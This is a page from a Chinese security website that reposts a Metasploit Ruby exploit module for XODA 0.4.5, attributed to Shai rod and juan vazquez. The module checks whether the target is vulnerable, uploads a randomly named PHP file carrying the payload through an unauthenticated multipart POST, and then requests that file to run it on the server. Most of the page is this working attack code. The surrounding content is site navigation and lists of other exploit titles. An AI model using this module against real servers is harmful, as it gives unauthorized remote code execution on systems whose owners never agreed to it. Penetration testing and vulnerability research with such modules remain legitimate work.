首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
XODA 0.4.5 Arbitrary PHP File Upload
来源:http://www.metasploit.com 作者:rod 发布时间:2012-08-24  
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::HttpClient

	def initialize(info={})
		super(update_info(info,
			'Name'           => "XODA 0.4.5 Arbitrary PHP File Upload Vulnerability",
			'Description'    => %q{
					This module exploits a file upload vulnerability found in XODA 0.4.5. Attackers
				can abuse the "upload" command in order to upload a malicious PHP file without any
				authentication, which results in arbitrary code execution. The module has been
				tested successfully on XODA 0.4.5 and Ubuntu 10.04.
			},
			'License'        => MSF_LICENSE,
			'Author'         =>
				[
					'Shai rod', # Vulnerability Discovery and PoC
					'juan vazquez' # Metasploit module
				],
			'References'     =>
				[
					[ 'EDB', '20703' ]
				],
			'Payload'        =>
				{
					'BadChars' => "\x00"
				},
			'DefaultOptions'  =>
				{
					'ExitFunction' => "none"
				},
			'Platform'       => ['php'],
			'Arch'           => ARCH_PHP,
			'Targets'        =>
				[
					['XODA 0.4.5', {}],
				],
			'Privileged'     => false,
			'DisclosureDate' => "Aug 21 2012",
			'DefaultTarget'  => 0))

		register_options(
			[
				OptString.new('TARGETURI', [ true, "The base path to the web application", "/xoda/"])
			], self.class)
	end


	def check
		uri = target_uri.path
		uri << '/' if uri[-1,1] != '/'

		res = send_request_raw({
			'method' => 'GET',
			'uri'    => "#{uri}?upload_to="
		})

		if res and res.code == 200 and res.body =~ /Upload a file/
			return Exploit::CheckCode::Detected
		else
			return Exploit::CheckCode::Safe
		end
	end

	def on_new_session(client)
		if client.type == "meterpreter"
			client.core.use("stdapi") if not client.ext.aliases.include?("stdapi")
			client.fs.file.rm(@payload_name)
		else
			client.shell_command_token(@payload_name)
		end
	end

	def exploit
		uri = target_uri.path
		uri << '/' if uri[-1,1] != '/'

		peer = "#{rhost}:#{rport}"
		@payload_name = Rex::Text.rand_text_alpha(rand(10) + 5) + '.php'

		boundary = "---------------------------#{Rex::Text.rand_text_numeric(27)}"

		post_data = "--#{boundary}\r\n"
		post_data << "Content-Disposition: form-data; name=\"files_to_upload[]\"; filename=\"#{@payload_name}\"\r\n\r\n"
		post_data << "<?php "
		post_data << payload.encoded
		post_data << " ?>\r\n"
		post_data << "--#{boundary}\r\n"
		post_data << "Content-Disposition: form-data; name=\"pwd\"\r\n\r\n"
		post_data << "\r\n"
		post_data << "--#{boundary}--\r\n"

		print_status("#{peer} - Sending PHP payload (#{@payload_name})")
		res = send_request_cgi({
			'method' => 'POST',
			'uri'    => "#{uri}?upload",
			'ctype'  => "multipart/form-data; boundary=#{boundary}",
			'data'   => post_data
		})

		if not res or res.code != 302
			print_error("#{peer} - File wasn't uploaded, aborting!")
			return
		end

		print_status("#{peer} - Executing PHP payload (#{@payload_name})")

		# Execute our payload
		res = send_request_cgi({
			'method' => 'GET',
			'uri'    => "#{uri}files/#{@payload_name}"
		})

		# If we don't get a 200 when we request our malicious payload, we suspect
		# we don't have a shell, either.  Print the status code for debugging purposes.
		if res and res.code != 200
			print_status("#{peer} - Server returned #{res.code.to_s}")
		end
	end

end

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Vice City Multiplayer Server 0
·WireShark 1.8.2 & 1.6.0 Buffer
·Apache Struts2 Remote Code Exe
·Express Burn Plus 4.58 Buffer
·Java 7 Applet Remote Code Exec
·E-Mail Security Virtual Applia
·Zabbix Server Arbitrary Comman
·SAP Netweaver Dispatcher 7.0 E
·Java 7 Applet Remote Code Exec
·Symantec Web Gateway <= 5.0.3.
·Total Video Player V1.31 m3u p
·Symantec Web Gateway <= 5.0.3.
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved